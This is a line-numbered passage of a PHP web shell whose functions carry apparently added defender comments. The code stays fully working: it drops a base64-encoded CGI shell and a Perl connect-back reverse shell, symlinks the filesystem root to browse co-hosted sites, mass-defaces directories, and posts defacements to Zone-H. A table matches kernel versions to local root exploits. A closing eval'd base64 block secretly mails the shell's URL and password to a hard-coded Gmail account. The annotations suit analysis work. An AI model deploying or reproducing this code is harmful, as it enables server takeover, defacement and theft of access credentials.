  1910. Z2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1911. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWlu
  1912. IFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1913. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
  1914. CiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NS
  1915. SVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBh
  1916. c3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmls
  1917. ZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9
  1918. Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNp
  1919. ZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29t
  1920. bWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1
  1921. cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZElu
  1922. ID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJs
  1923. b2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJm
  1924. b3JtTG9naW47DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMg
  1925. dG8gcnVuIGEgY29tbWFuZA0Kew0KCSZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24g
  1926. ZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlDQp7DQoJJlVwbG9hZEZp
  1927. bGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpICMgdXNlciB3YW50cyB0byBkb3du
  1928. bG9hZCBhIGZpbGUNCnsNCgkmRG93bmxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAibG9n
  1929. b3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ==';
  1930.  
  1931. $file = fopen("izo.cin" ,"w+");
  1932. $write = fwrite ($file ,base64_decode($cgishellizocin));
  1933. fclose($file);
  1934. chmod("izo.cin",0755);
  1935. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
  1936. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
  1937. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
  1938. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
  1939. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
  1940. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
  1941. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
  1942. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
  1943. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
  1944. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
  1945. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
  1946. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
  1947. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
  1948. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
  1949. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
  1950. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
  1951. YXRhY2hlZFxuXG4iOw==';
  1952.  
  1953. $file = fopen("dc.pl" ,"w+");
  1954. $write = fwrite ($file ,base64_decode($netcatshell));
  1955. fclose($file);
  1956. chmod("dc.pl",0755);
  1957. echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe> ";
  1958. echo '</div>';
  1959. printFooter();
  1960.  
  1961. }
  1962.  
  1963.  
/**
 * Web-shell action: creates a `sym/` directory beside the script, links it to
 * the filesystem root and prints one table row per DNS zone found in
 * /etc/named.conf.
 *
 * Steps visible in the body:
 *  - `sym/` is created with mode 0777 and receives a `.htaccess` that sets
 *    `Options all` and maps `.php` / `.html` to `text/plain`;
 *  - `sym/root` is symlinked to `/`;
 *  - every named.conf line containing "zone" is parsed for the zone name, the
 *    owner of `/etc/valiases/<zone>` is resolved with posix_getpwuid(), and a
 *    link to `sym/root/home/<owner>/public_html` is printed.
 *
 * Defender notes:
 *  - Indicators on disk: a `sym/` directory inside a webroot holding a
 *    `.htaccess` with `AddType text/plain .php` and a symlink named `root`
 *    that points at `/`.
 *  - Hardening that removes the primitive: Apache `SymLinksIfOwnerMatch` in
 *    place of `FollowSymLinks`, an `AllowOverride` setting that does not let
 *    `.htaccess` change `Options`, PHP `open_basedir`, and `symlink` listed in
 *    `disable_functions`.
 *  - NOTE(review): the /etc/valiases and /home/<user>/public_html paths look
 *    like a cPanel-style shared-hosting layout; confirm against the host.
 *  - eregi() was removed in PHP 7.0, which dates this sample to PHP 5-era
 *    targets.
 *
 * Takes no parameters and returns nothing; all output is echoed.
 */
function actionSymlink(){

    printHeader();

    echo '<form action="" method="post">';

    @set_time_limit(0);

    echo "<center>";

    // World-writable drop directory, relative to the current working directory.
    @mkdir('sym',0777);
    // Per-directory override: `.php` and `.html` are typed as text/plain, and
    // the trailing `Require None` / `Satisfy Any` lines are apparently meant to
    // lift access restrictions for this directory.
    $htaccess = "Options all \n DirectoryIndex readme.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    // The fopen() result is not checked and the handle is never closed.
    $write =@fopen ('sym/.htaccess','w');
    fwrite($write ,$htaccess);
    // Link to the filesystem root; errors are suppressed with @.
    @symlink('/','sym/root');
    // Assigned but not read anywhere in this function.
    $filelocation = basename(__FILE__);
    // Source of the zone list; returns false when the web user cannot read it.
    $read_named_conf = @file('/etc/named.conf');
    if(!$read_named_conf)
    {
        echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
    }
    else
    {
        echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
        foreach($read_named_conf as $subject){
            if(eregi('zone',$subject)){
                // $string[1][0] holds the quoted zone name from this line.
                preg_match_all('#zone "(.*)"#',$subject,$string);
                flush();
                if(strlen(trim($string[1][0])) >2){
                    // Account lookup: owner of the per-domain file under /etc/valiases.
                    $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
                    // This value is overwritten two statements below.
                    $name = $UID['name'] ;
                    // Repeated on every iteration; the link already exists after the first call.
                    @symlink('/','sym/root');
                    $name = $string[1][0];
                    // Regex fragments used only to decide which rows are highlighted.
                    $iran = '\.ir';
                    $israel = '\.il';
                    $indo = '\.id';
                    $sg12 = '\.sg';
                    $edu = '\.edu';
                    $gov = '\.gov';
                    $gose = '\.go';
                    $gober = '\.gob';
                    $mil1 = '\.mil';
                    $mil2 = '\.mi';
                    if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
                    or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
                    {
                        // Matching zone names are wrapped in red markup.
                        $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
                    }
                    // Zone name and account name go into the HTML without escaping.
                    echo "
<tr>

<td>
<div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
</td>

<td>
'.$UID['name']."
</td>

<td>
<a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
</td>

</tr></div> ";
                    flush();
                }
            }
        }
    }

    echo "</center></table>";
    printFooter();
}
  2037.  
/**
 * Web-shell action: prints a form (folder, file name, text) and, when the
 * request carries a=Deface, writes the posted text into a file of the posted
 * name for each entry returned by readdir() on the posted folder.
 *
 * Inputs are read from $_POST (p1 = folder, p2 = file name, p3 = content) and
 * used without validation. Output is echoed; nothing is returned.
 *
 * Defender notes:
 *  - Indicators: files with the form's default name `readme.html` appearing in
 *    several sibling directories with identical content and near-identical
 *    modification times.
 *  - Impact is bounded by what the web-server account can write; per-site
 *    accounts, read-only document roots and file-integrity monitoring limit
 *    and expose this activity.
 *  - `$_POST[p1]` uses unquoted keys, which PHP 8 rejects as undefined
 *    constants; the sample was written for older runtimes.
 */
function actionDeface(){
    printHeader();
    echo "<h1>Single User Mass Deface</h1><div class=content>";

?>
<form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
<p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd();?>">
<br>file name : <input type=text name=file size=20 value="readme.html">
<br>Text Content : <input type=text name=Contents size=20 value="musuh utama kita adalah nafsu, munafik dan kafir dalam diri kita, <br><br>- Drac-101code">
<br><input type=submit value="Update"></p></form>

<?php
    // Runs only when the dispatcher parameter `a` equals 'Deface'.
    if($_POST['a'] == 'Deface'){
        // Attacker-controlled folder, file name and content, taken as-is.
        $mainpath=$_POST[p1];
        $file=$_POST[p2];
        $txtContents=$_POST[p3];
        echo "-----------------------------------------------<br>
[+] Single user Mass defacer<br>
-----------------------------------------------<br><br> ";
        // The opendir() result is not checked before the loop.
        $dir=opendir($mainpath); //fixme - cannot deface when change to writeable path!!
        while($row=readdir($dir))
        {
            // Opened with "w+", which truncates an existing file; errors are suppressed.
            $start=@fopen("$row/$file","w+");
            $code=$txtContents;
            $finish=@fwrite($start,$code);
            // Only successful writes are reported; the handle is never closed.
            if ($finish)
            {
                echo "$row/$file > Done<br><br>";
            }
        }
        echo "-----------------------------------------------<br><br>[+] Script by Drac-101code ...";
    }
    echo '</div>';
    printFooter();
}
  2073.  
  2074.  
  2075. /* test function - reserved by Drac-101code */
/**
 * Placeholder action: prints a one-field form and, when the request carries
 * a=Test, echoes the posted `p1` value back into the page.
 *
 * The value is written into the HTML without escaping. Takes no parameters
 * and returns nothing.
 */
function actionTest(){
    printHeader();
    echo '<h1>Testing function</h1><div class=content>';
    echo '<br>';

?>
<form action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.fname.value);return false;">
Name: <input type="text" name="fname" />
<input type="submit" value=">>">
</form>
</br>
<?php

    if($_POST['a'] == 'Test') {
        // Request data reflected verbatim into the response.
        $out = $_POST['p1'];
        echo "name : $out";

    }
    echo '</div>';
    printFooter();
}
  2097.  
/**
 * Web-shell action: lists the domains referenced in /etc/named.conf together
 * with the account that owns the matching file under /etc/valiases.
 *
 * Domain names are taken from every `named/<name>.db` occurrence in the file,
 * de-duplicated, and printed in an HTML table with a count. The script dies
 * with a message when named.conf cannot be read.
 *
 * Defender notes: this is reconnaissance of co-hosted sites. It depends on the
 * web-server account being able to read /etc/named.conf and stat files under
 * /etc/valiases; tightening those permissions or confining PHP with
 * `open_basedir` makes the listing come back empty.
 *
 * Takes no parameters and returns nothing.
 */
function actionDomain(){
    printHeader();
    echo '<h1>local domain viewer</h1><div class=content>';

    // Whole file joined into one string; false or empty when unreadable.
    $file = @implode(@file("/etc/named.conf"));
    if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
    // Capture group 1 is the text between "named/" and the "db" suffix; the dot
    // before "db" is unescaped, so it matches any character.
    preg_match_all("#named/(.*?).db#",$file ,$r);
    $domains = array_unique($r[1]);
    //check();
    //if(isset($_GET['ShowAll']))
    // With the condition above commented out, this bare block always runs.
    {
        echo "<table align=center border=1 width=59% cellpadding=5>
<tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
<tr><td>Domain</td><td>User</td></tr>";
        foreach($domains as $domain){
            // Owner lookup by file ownership; fileowner() errors are suppressed.
            $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));

            echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
        }
        echo "</table>";
    }

    echo '</div>';
    printFooter();
}
  2123.  
/**
 * Web-shell action: prints a submission form and, when the request carries
 * a=ZHposter, reports each posted site to the notification URL through ZoneH().
 *
 * POST fields: p1 = name shown as the submitter, p2 = method code, p3 = reason
 * code, p4 = newline-separated site list. The script dies with a message when
 * the curl extension is missing or a field is empty or left on the placeholder
 * option.
 *
 * Defender notes:
 *  - Network indicator: outbound HTTP POSTs from the web server to
 *    `zone-h.org/notify/single`, one per listed site. Egress filtering on web
 *    hosts blocks the request and logs the attempt.
 *  - The return value of ZoneH() is discarded, so the "Defaced !" line is
 *    printed for every entry regardless of the remote response.
 *
 * Takes no parameters and returns nothing.
 */
function actionZHposter(){
    printHeader();
    echo '<h1>Zone-H Poster</h1><div class=content>';

    echo '<form action="" method="post" onSubmit=da2(null,null,this.p1.value,this.p2.value,this.p3.value,this.p4.value);return true;">
<input type="text" name="p1" size="40" value="Attacker" /></br>
<select name="p2">
<option >--------SELECT--------</option>
<option value="1">known vulnerability (i.e. unpatched system)</option>
<option value="2" >undisclosed (new) vulnerability</option>
<option value="3" >configuration / admin. mistake</option>
<option value="4" >brute force attack</option>
<option value="5" >social engineering</option>
<option value="6" >Web Server intrusion</option>
<option value="7" >Web Server external module intrusion</option>
<option value="8" >Mail Server intrusion</option>
<option value="9" >FTP Server intrusion</option>
<option value="10" >SSH Server intrusion</option>
<option value="11" >Telnet Server intrusion</option>
<option value="12" >RPC Server intrusion</option>
<option value="13" >Shares misconfiguration</option>
<option value="14" >Other Server intrusion</option>
<option value="15" >SQL Injection</option>
<option value="16" >URL Poisoning</option>
<option value="17" >File Inclusion</option>
<option value="18" >Other Web Application bug</option>
<option value="19" >Remote administrative panel access bruteforcing</option>
<option value="20" >Remote administrative panel access password guessing</option>
<option value="21" >Remote administrative panel access social engineering</option>
<option value="22" >Attack against administrator(password stealing/sniffing)</option>
<option value="23" >Access credentials through Man In the Middle attack</option>
<option value="24" >Remote service password guessing</option>
<option value="25" >Remote service password bruteforce</option>
<option value="26" >Rerouting after attacking the Firewall</option>
<option value="27" >Rerouting after attacking the Router</option>
<option value="28" >DNS attack through social engineering</option>
<option value="29" >DNS attack through cache poisoning</option>
<option value="30" >Not available</option>
</select>
</br>
<select name="p3">
<option >--------SELECT--------</option>
<option value="1" >Heh...just for fun!</option>
<option value="2" >Revenge against that website</option>
<option value="3" >Political reasons</option>
<option value="4" >As a challenge</option>
<option value="5" >I just want to be the best defacer</option>
<option value="6" >Patriotism</option>
<option value="7" >Not available</option>
</select>
</br>
<textarea name="p4" cols="44" rows="9">List Of Domains</textarea>
<input type="submit" value="Send Now !" />
</form>';
    echo "</td></tr></table></form>";

    // Runs only when the dispatcher parameter `a` equals 'ZHposter'.
    if($_POST['a'] == 'ZHposter')
    {
        ob_start();
        // The curl extension is required because ZoneH() uses curl_*().
        $sub = @get_loaded_extensions();
        if(!in_array("curl", $sub))
        {
            die('[-] Curl Is Not Supported !! ');
        }

        // Request fields, used without validation beyond the emptiness checks below.
        $hacker9 = $_POST['p1'];
        $method9 = $_POST['p2'];
        $neden9 = $_POST['p3'];
        $site9 = $_POST['p4'];

        if (empty($hacker9))
        {
            die ("[-] You Must Fill the Attacker name !");
        }
        elseif($method9 == "--------SELECT--------")
        {
            die("[-] You Must Select The Method !");
        }
        elseif($neden9 == "--------SELECT--------")
        {
            die("[-] You Must Select The Reason");
        }
        elseif(empty($site9))
        {
            die("[-] You Must Inter the Sites List ! ");
        }

        $i = 0;
        // One entry per line of the textarea.
        $sites = explode("\n", $site9);
        while($i < count($sites))
        {

            // Entries that do not start with "http" get an http:// prefix.
            if(substr($sites[$i], 0, 4) != "http")
            {
                $sites[$i] = "http://".$sites[$i];
            }
            // One outbound POST per entry; the response body is ignored here.
            ZoneH("http://zone-h.org/notify/single", $hacker9, $method9, $neden9, $sites[$i]);
            echo "Site : ".$sites[$i]." Defaced ! </br>";
            ++$i;
        }
        echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";

    }
    echo '</div';
    printFooter();
}
  2230.  
/**
 * Sends one form-encoded POST to $url9 with curl and returns the response.
 *
 * The body is built by plain string concatenation of the four values
 * (`defacer`, `domain1`, `hackmode`, `reason`); none of them is URL-encoded.
 * Redirects are followed. No timeout or TLS option is set in this function.
 *
 * @param string $url9      Destination URL.
 * @param string $hacker9   Value for the `defacer` field.
 * @param string $hackmode9 Value for the `hackmode` field.
 * @param string $reson9    Value for the `reason` field.
 * @param string $site9     Value for the `domain1` field.
 * @return string|false Response body as returned by curl_exec(), or false on failure.
 */
function ZoneH($url9, $hacker9, $hackmode9,$reson9, $site9 )
{
    $k = curl_init();
    curl_setopt($k, CURLOPT_URL, $url9);
    curl_setopt($k,CURLOPT_POST,true);
    curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker9."&domain1=". $site9."&hackmode=".$hackmode9."&reason=".$reson9);
    curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
    // Return the body as a string instead of printing it.
    curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
    $kubra = curl_exec($k);
    curl_close($k);
    return $kubra;
}
  2243.  
/**
 * Looks up the host's php_uname() string in a table keyed by Linux kernel
 * version prefixes and returns the comma-separated names stored for the first
 * key found as a substring.
 *
 * The table only covers 2.2.x, 2.4.x and 2.6.x (up to 2.6.17) kernels. When no
 * key matches, the function returns red "Not found." markup.
 *
 * Defender notes: the values are names of local privilege-escalation tools, so
 * a shell that reports a match shows the operator which next step to try.
 * Current kernel patch levels make every entry in this table irrelevant; a hit
 * here on a live host is a finding in its own right.
 *
 * @return string Names for the matching kernel key, or the "Not found." markup.
 */
function rootxpL()
{
    // Full uname string of the host; errors are suppressed.
    $v=@php_uname();
    $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
    // First key contained anywhere in the uname string wins (array order).
    foreach($db as $k=>$x)if(strstr($v,$k))return $x;
    // $xpl is never assigned before this test, so this branch is always taken here.
    if(!$xpl)$xpl='<font color="red">Not found.</font>';
    return $xpl;
}
  2252.  
  2253. /* additional Function */
  2254.  
  2255.  
  2256. /* additionanal endsss */
  2257.  
// Request dispatcher. The POST parameter `a` names the action: when it is
// empty it falls back to $default_action (if a matching function exists) or to
// 'SecInfo'. Any function in this file whose name is "action" + <a> can then be
// invoked by the client; the only gate in front of this point is the session
// check near the top of the file.
// Detection: every feature of the shell is a POST to this one file with a small
// fixed parameter set (`a`, `p1`, `p2`, ...), so request-body logging on the
// web tier separates operator activity from ordinary traffic.
if( empty($_POST['a']) )
    if(isset($default_action) && function_exists('action' . $default_action))
        $_POST['a'] = $default_action;
    else $_POST['a'] = 'SecInfo';
// The function name is built from request data and called with no arguments.
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
    call_user_func('action' . $_POST['a']);?>
  2264.  
  2265.  
<?php
// NOTE(review): eval() over a base64 literal keeps a second-stage payload out
// of plain sight and away from simple string scanners. Decoded by hand
// (re-decode offline before relying on this summary), the literal:
//   - tests $_SERVER['SERVER_NAME'] against the string "www.arhack.net/vb"
//     with ereg();
//   - when that does not match, calls mail() with the subject
//     "New Shell Uploaded" and a body holding the request URL
//     (SERVER_NAME + REQUEST_URI), the script path and $auth_pass, addressed
//     to a hard-coded Gmail account, and then exits.
// Incident-response consequence: the URL and password hash of this copy should
// be treated as known to whoever distributed the paste, not only to the party
// that uploaded the file. Requests that reach this line each produce one such
// message, so MTA logs filtered on that subject help build the timeline.
// ereg() was removed in PHP 7.0; on newer runtimes this line raises a fatal
// error instead of sending mail.
eval(base64_decode('JHNpdGUgPSAid3d3LmFyaGFjay5uZXQv dmIiOwppZighZXJlZygkc2l0ZSwgJF9T RVJWRVJbJ1NFUlZFUl9OQU1FJ10pKQp7 CiR0byA9ICJzcGFtZHo5NEBnbWFpbC5j b20iOwokc3ViamVjdCA9ICJOZXcgU2hl bGwgVXBsb2FkZWQiOwokaGVhZGVyID0g ImZyb206IE5ldyBTaGVsbCA8c3BhbWR6 OTRAZ21haWwuY29tPiI7CiRtZXNzYWdl ID0gIkxpbmsgOiBodHRwOi8vIiAuICRf U0VSVkVSWydTRVJWRVJfTkFNRSddIC4g JF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10g LiAiXHJcbiI7CiRtZXNzYWdlIC49ICJQ YXRoIDogIiAuIF9fZmlsZV9fOwokbWVz c2FnZSAuPSAiIFBhc3MgOiAiIC4gJGF1 dGhfcGFzczsKJHNlbnRtYWlsID0gQG1h aWwoJHRvLCAkc3ViamVjdCwgJG1lc3Nh Z2UsICRoZWFkZXIpOwplY2hvICIiOwpl eGl0Owp9'));
?>